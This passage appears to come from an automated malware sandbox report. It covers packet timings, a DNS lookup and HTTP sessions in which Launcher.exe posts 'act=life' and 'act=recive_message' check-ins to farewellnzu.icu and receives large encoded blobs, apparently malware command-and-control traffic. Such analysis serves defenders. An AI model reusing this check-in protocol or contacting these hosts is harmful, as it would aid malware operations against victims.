                                                                      Nov 23, 2024 15:12:56.824773073 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.824841022 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.826350927 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.826363087 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.826380014 CET49699443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.826386929 CET44349699172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.894089937 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.894130945 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:56.894201994 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.895020008 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:56.895035028 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.155812979 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.155925989 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.157526016 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.157533884 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.157854080 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.159085989 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.159112930 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.159167051 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.873917103 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.873965979 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.874015093 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.874025106 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.874080896 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.874118090 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.874120951 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.874130011 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.874171019 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.876502037 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.884938955 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.884990931 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.885001898 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.893465996 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.893516064 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.893523932 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:58.947233915 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:58.993577957 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.041001081 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.094835043 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.098459005 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.098593950 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.099560022 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.099880934 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.099900007 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.099922895 CET49700443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.099929094 CET44349700172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.194152117 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.194242954 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:12:59.194330931 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.194700956 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:12:59.194737911 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:00.455862999 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:00.455992937 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:00.457305908 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:00.457340002 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:00.457694054 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:00.458870888 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:00.459079981 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:00.459129095 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:01.239933968 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:01.240096092 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:01.240185022 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:01.240328074 CET49701443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:01.240371943 CET44349701172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:01.321338892 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:01.321388006 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:01.321595907 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:01.321896076 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:01.321922064 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:02.633691072 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:02.633811951 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:02.653624058 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:02.653647900 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:02.654014111 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:02.655536890 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:02.655688047 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:02.655724049 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:02.655774117 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:02.699371099 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:03.413450003 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:03.413566113 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:03.413623095 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:03.413747072 CET49702443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:03.413764954 CET44349702172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:03.607177973 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:03.607255936 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:03.607353926 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:03.607830048 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:03.607866049 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:04.879388094 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:04.879611969 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:04.881010056 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:04.881036043 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:04.881300926 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:04.882678032 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:04.882846117 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:04.882894993 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:04.882967949 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:04.882986069 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:05.802805901 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:05.802902937 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:05.802974939 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:05.803095102 CET49703443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:05.803133011 CET44349703172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:06.005470991 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:06.005548954 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:06.005636930 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:06.005986929 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:06.006026983 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.273400068 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.273471117 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.274794102 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.274823904 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.275079966 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.276607990 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.276696920 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.276710033 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.978266001 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.978368998 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:07.978424072 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.978615046 CET49705443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:07.978637934 CET44349705172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:08.498517036 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:08.498542070 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:08.498615026 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:08.498943090 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:08.498951912 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.880930901 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.881038904 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.882291079 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.882316113 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.882577896 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.911448002 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.912528992 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.912589073 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.912708044 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.912763119 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.912916899 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.912966967 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.913145065 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.913225889 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.913429022 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.913492918 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.913712025 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.913765907 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.913795948 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.913825989 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.913932085 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.913979053 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.914022923 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.914124012 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.914186001 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.959331989 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.959583044 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.959683895 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.959748983 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.959805012 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:09.959882021 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:09.959934950 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:12.205096006 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:12.205185890 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:12.205302000 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:12.205461025 CET49711443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:12.205504894 CET44349711172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:12.274583101 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:12.274626970 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:12.274703026 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:12.275221109 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:12.275247097 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:13.547934055 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:13.548013926 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:13.549526930 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:13.549549103 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:13.549803019 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:13.551059008 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:13.551100016 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:13.551157951 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:14.265322924 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:14.265415907 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:14.265620947 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:14.265702009 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:14.265736103 CET44349724172.67.198.61192.168.2.6
                                                                      Nov 23, 2024 15:13:14.265763044 CET49724443192.168.2.6172.67.198.61
                                                                      Nov 23, 2024 15:13:14.265782118 CET44349724172.67.198.61192.168.2.6
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 15:12:54.620918036 CET5914253192.168.2.61.1.1.1
                                                                      Nov 23, 2024 15:12:54.858772993 CET53591421.1.1.1192.168.2.6
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 15:12:54.620918036 CET192.168.2.61.1.1.10xe306Standard query (0)farewellnzu.icuA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 15:12:54.858772993 CET1.1.1.1192.168.2.60xe306No error (0)farewellnzu.icu172.67.198.61A (IP address)IN (0x0001)false
                                                                      Nov 23, 2024 15:12:54.858772993 CET1.1.1.1192.168.2.60xe306No error (0)farewellnzu.icu104.21.44.93A (IP address)IN (0x0001)false
                                                                      • farewellnzu.icu
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.649699172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:12:56 UTC262OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:12:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-11-23 14:12:56 UTC1015INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:12:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=bur5qqo4rim4r991pducgjjtru; expires=Wed, 19-Mar-2025 07:59:35 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YG9jtUs8ZycjsW79WSKy4pRRz12Nbkj7L7Z%2FMIypbQjlYPiRa2p%2BUCx%2BRPcz%2Bb0fF06Vz6jqVYV%2Bn5u28Kv2I5A%2BJ9g5EP185At8VWb8hOTYZhg5ilZ8cg6tlvAtcbGxcH8%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c1cc8cb1436c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1778319&cwnd=244&unsent_bytes=0&cid=24769fd4ad5a4a7f&ts=703&x=0"
                                                                      2024-11-23 14:12:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-11-23 14:12:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649700172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:12:58 UTC263OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 54
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:12:58 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--znnuaosvghun&j=
                                                                      2024-11-23 14:12:58 UTC1019INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:12:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=67o4365p4tdlm39j3pc1hg4167; expires=Wed, 19-Mar-2025 07:59:37 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9qQw%2FP75BnFIBHGvBS3z0fYKYQd4gps61JvLvg7XY8ZN%2FOqxAvo%2Bh49jw0%2Fs4QqAHH%2BdNYOzLnpAjaW8IuJp5c9eM%2FzfljEgJ%2B1%2BEzGL7n1De3F7vXSSKgsOnxsXlL4xCg%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c1d94dd843e3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2117&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1435594&cwnd=234&unsent_bytes=0&cid=de69c5fb0d85fd21&ts=726&x=0"
                                                                      2024-11-23 14:12:58 UTC350INData Raw: 34 34 36 63 0d 0a 4a 53 31 51 51 44 33 49 74 36 7a 71 71 41 49 36 36 30 48 59 39 5a 38 32 50 34 6b 4e 59 68 44 4d 51 64 45 6e 6f 34 38 37 7a 31 4a 65 44 79 5a 69 42 2f 79 62 6a 70 6e 4e 49 41 43 66 4d 36 32 51 73 78 52 65 37 53 39 59 64 71 30 74 6f 6b 4b 50 72 55 32 69 63 42 39 4c 4d 53 78 4f 72 5a 75 4f 6a 39 41 67 41 4c 41 36 2b 70 44 78 46 41 57 72 61 41 68 79 72 53 32 7a 52 73 6a 67 53 36 4d 78 54 55 45 33 4b 46 69 72 30 38 32 47 78 57 64 66 6a 69 43 79 6d 2f 5a 62 56 2b 51 76 54 6a 4b 70 4f 2f 4d 64 67 63 4a 65 75 7a 4e 6f 54 43 4d 72 48 37 57 62 31 38 6a 4e 62 42 6a 52 59 37 6d 51 2f 56 70 5a 37 57 59 4b 65 4b 51 6c 73 6b 50 4a 2f 31 4b 70 4f 6b 31 50 4e 43 6c 53 6f 73 66 41 6a 4d 4a 73 57 59 51 67 2b 74 6d 39 55 30 57 72 4e 30 41 68 6e 43 43 69 56
                                                                      Data Ascii: 446cJS1QQD3It6zqqAI660HY9Z82P4kNYhDMQdEno487z1JeDyZiB/ybjpnNIACfM62QsxRe7S9Ydq0tokKPrU2icB9LMSxOrZuOj9AgALA6+pDxFAWraAhyrS2zRsjgS6MxTUE3KFir082GxWdfjiCym/ZbV+QvTjKpO/MdgcJeuzNoTCMrH7Wb18jNbBjRY7mQ/VpZ7WYKeKQlskPJ/1KpOk1PNClSosfAjMJsWYQg+tm9U0WrN0AhnCCiV
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 4e 43 78 65 70 39 58 63 67 4d 46 72 58 5a 73 6f 73 35 72 77 56 46 44 68 59 41 4e 79 71 53 6d 35 53 73 76 70 56 4b 41 32 52 30 39 79 62 42 2b 74 7a 59 37 51 69 6b 4e 64 6d 53 53 32 67 62 39 75 48 66 51 68 47 54 4b 70 4c 2f 4d 64 67 65 56 63 72 6a 4e 4d 51 44 45 71 56 4c 6a 56 33 49 37 48 5a 55 71 50 4a 72 53 64 2f 6b 5a 58 35 57 6b 44 65 36 55 71 74 6b 4c 46 72 52 66 74 4e 31 38 50 61 6d 4a 2b 70 39 37 43 67 74 31 67 47 4a 5a 74 6f 39 66 36 57 42 32 7a 4c 77 52 7a 71 69 4b 33 53 38 2f 70 56 61 73 2b 53 6b 41 30 4b 46 2b 74 33 38 61 41 79 32 31 54 68 69 4f 2f 6d 76 6c 53 55 65 70 71 51 44 7a 75 4a 4b 73 46 6d 61 31 33 71 6a 4e 56 44 51 63 68 55 61 54 53 32 4d 6a 56 4c 6b 48 4a 4a 4c 62 58 70 52 52 54 37 6d 41 53 63 37 77 6d 76 56 66 4e 36 46 2b 67 4d 30 6c
                                                                      Data Ascii: NCxep9XcgMFrXZsos5rwVFDhYANyqSm5SsvpVKA2R09ybB+tzY7QikNdmSS2gb9uHfQhGTKpL/MdgeVcrjNMQDEqVLjV3I7HZUqPJrSd/kZX5WkDe6UqtkLFrRftN18PamJ+p97Cgt1gGJZto9f6WB2zLwRzqiK3S8/pVas+SkA0KF+t38aAy21ThiO/mvlSUepqQDzuJKsFma13qjNVDQchUaTS2MjVLkHJJLbXpRRT7mASc7wmvVfN6F+gM0l
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 61 54 53 32 4d 6a 56 4c 6b 48 4a 4a 4c 62 58 70 52 52 52 34 6d 38 4c 65 4b 6f 6a 74 45 6a 45 37 6c 36 75 50 55 42 46 50 43 56 62 70 74 7a 44 6a 73 70 6e 58 49 77 78 76 35 37 78 57 42 32 6c 4c 77 64 71 37 6e 76 7a 61 73 62 37 57 6f 49 7a 56 6b 5a 79 50 52 47 7a 6c 63 6d 45 69 6a 67 59 6a 69 61 79 6e 50 74 63 58 66 6c 71 44 6e 6d 76 4b 62 56 45 7a 4f 46 66 72 54 46 48 53 54 34 69 57 4b 33 48 33 49 33 4d 63 6c 4c 4a 62 66 71 51 35 52 51 46 71 31 6b 51 5a 62 38 31 38 58 44 43 34 31 65 71 4a 67 64 51 66 44 73 66 72 64 6d 4f 30 49 70 72 57 49 55 6b 73 70 48 35 58 46 4c 6b 5a 68 4a 7a 6f 69 32 68 51 73 48 6b 56 36 49 38 54 6b 49 31 4c 31 53 67 32 4d 71 50 79 79 41 57 79 53 53 69 31 36 55 55 61 2f 74 69 44 46 79 6c 4c 37 6f 46 33 71 4e 41 37 54 64 4c 44 32 70 69
                                                                      Data Ascii: aTS2MjVLkHJJLbXpRRR4m8LeKojtEjE7l6uPUBFPCVbptzDjspnXIwxv57xWB2lLwdq7nvzasb7WoIzVkZyPRGzlcmEijgYjiaynPtcXflqDnmvKbVEzOFfrTFHST4iWK3H3I3MclLJbfqQ5RQFq1kQZb818XDC41eqJgdQfDsfrdmO0IprWIUkspH5XFLkZhJzoi2hQsHkV6I8TkI1L1Sg2MqPyyAWySSi16UUa/tiDFylL7oF3qNA7TdLD2pi
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 47 4a 7a 6d 56 64 6a 53 53 2b 6b 66 49 55 45 36 74 6f 47 44 4c 32 59 35 78 69 39 4b 39 34 6c 33 42 59 41 53 74 69 57 4b 61 56 6c 73 6a 47 59 31 53 42 4c 4c 79 65 38 56 35 55 34 47 4d 4c 64 71 49 71 74 6b 50 41 36 46 79 73 4e 45 74 46 4e 43 46 63 70 64 72 42 67 49 6f 75 47 49 34 37 2b 73 2b 39 63 55 72 67 59 51 59 79 73 57 32 71 42 63 62 68 47 66 56 77 53 30 59 30 4a 46 71 6d 31 4d 69 41 7a 32 68 63 69 43 57 38 6c 50 4a 51 57 4f 70 67 42 48 36 67 4b 62 4a 45 7a 65 5a 57 70 6a 55 48 41 58 49 6c 52 2b 71 4e 6a 72 6e 4a 64 6b 2b 5a 4c 2f 71 49 73 30 30 64 37 47 4e 41 4b 75 34 69 6f 55 2f 4c 34 31 79 69 4e 55 52 41 4e 53 39 5a 70 74 2f 48 67 4d 78 76 55 5a 73 67 74 70 6e 36 57 6c 48 6c 59 67 70 78 6f 32 50 39 42 63 62 31 47 66 56 77 61 30 67 2f 44 46 53 6d 30
                                                                      Data Ascii: GJzmVdjSS+kfIUE6toGDL2Y5xi9K94l3BYAStiWKaVlsjGY1SBLLye8V5U4GMLdqIqtkPA6FysNEtFNCFcpdrBgIouGI47+s+9cUrgYQYysW2qBcbhGfVwS0Y0JFqm1MiAz2hciCW8lPJQWOpgBH6gKbJEzeZWpjUHAXIlR+qNjrnJdk+ZL/qIs00d7GNAKu4ioU/L41yiNURANS9Zpt/HgMxvUZsgtpn6WlHlYgpxo2P9Bcb1GfVwa0g/DFSm0
